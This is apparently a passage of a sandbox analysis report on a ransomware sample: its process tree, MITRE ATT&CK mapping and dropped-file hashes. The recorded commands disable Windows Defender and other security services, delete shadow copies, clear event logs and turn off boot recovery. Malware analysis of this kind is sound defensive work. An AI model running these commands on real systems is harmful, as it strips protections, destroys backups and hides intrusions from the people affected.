    C:\Windows\system32\net1 stop "wbengine" /y
    3⤵
    PID:4416
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "WebClient" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4304
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WebClient" /y
    3⤵
    PID:2768
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "UnistoreSvc_292d1" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4984
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "UnistoreSvc_292d1" /y
    3⤵
    PID:1900
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SamSs" start= disabled
  2⤵
  - Launches sc.exe
  PID:552
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SDRSVC" start= disabled
  2⤵
  - Launches sc.exe
  PID:4216
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SstpSvc" start= disabled
  2⤵
  - Launches sc.exe
  PID:3100
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "vmicvss" start= disabled
  2⤵
  - Launches sc.exe
  PID:4368
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "VSS" start= disabled
  2⤵
  - Launches sc.exe
  PID:3452
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "wbengine" start= disabled
  2⤵
  - Launches sc.exe
  PID:3252
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "WebClient" start= disabled
  2⤵
  - Launches sc.exe
  PID:2836
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "UnistoreSvc_292d1" start= disabled
  2⤵
  - Launches sc.exe
  PID:1296
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:4592
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:3048
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:4140
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  PID:3904
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2⤵
  PID:4364
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:548
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2372
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2720
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:4692
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:3020
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  PID:5072
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  PID:3504
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  PID:4696
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  2⤵
  PID:1848
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:812
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:2748
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  PID:2824
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  PID:4852
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  PID:2092
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  PID:3684
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  PID:624
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  2⤵
  PID:4688
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  2⤵
  PID:3548
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  2⤵
  PID:4200
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:4324
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:2368
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:4832
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:3400
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:4548
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:2892
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:5064
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies security service
  PID:3944
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:3764
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:1464
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl system
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:1572
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl security
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:4892
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl application
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:1132
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4388
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe shadowcopy delete
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3620
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:968
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled no
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2620
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  2⤵
  PID:3160
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:2912
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIOAVProtection $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4456
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:2168
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableRealtimeMonitoring $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4152

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Direct Volume Access

T1006

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Java\jre-1.8\lib\images\cursors\invalid32x32.gif.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj

Filesize
153B

MD5
1e9d8f133a442da6b0c74d49bc84a341

SHA1
259edc45b4569427e8319895a444f4295d54348f

SHA256
1a1d3079d49583837662b84e11d8c0870698511d9110e710eb8e7eb20df7ae3b

SHA512
63d6f70c8cab9735f0f857f5bf99e319f6ae98238dc7829dd706b7d6855c70be206e32e3e55df884402483cf8bebad00d139283af5c0b85dc1c5bf8f253acd37

Download Submit
C:\Program Files\Microsoft Office\root\Office16\1033\ONENOTE_F_COL.HXK.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_GAAAABgAAAA0.cv2gj

Filesize
114B

MD5
b8fbbc73ddde31636552ab184b4e398f

SHA1
5cfbfaea56e979a07c083f2340b10a5894812d78

SHA256
3c3702253a4695b5bcb18a2565b1d49f9f32f5f9f2442fd1395197970fa34edb

SHA512
7f0f4b098e0d37ed403be8d54e2dcbc603791ddf00e3a21747c41ecfb829fdf664b6bddda8d51309e1229b197244a1d8ae23e1b3bf3348f99f84a7a8684db8d7

Download Submit
C:\Program Files\Microsoft Office\root\Office16\1033\POWERPNT_K_COL.HXK.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_LAAAACwAAAA0.cv2gj

Filesize
113B

MD5
db9742e49c49c505b293a84518e95fa5

SHA1
406dae0b226900aad2ad2e10d8366651b848c053

SHA256
1c17b95e5098adb0c0e06aac8a8c7c50c6a5ef1b696465d548c8a922f1d3a653

SHA512
974917a72b2b3b783bb0ffcbfe0058489ae65ac0aa71ae86d77195780aeb7800848a3158fbe7ad8ddf9b30145d8a1a2c66f72484305ccf363b7981f105be295b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3mmlqc2i.mgg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4456-2-0x0000028AF3840000-0x0000028AF3862000-memory.dmp

Filesize
136KB

Download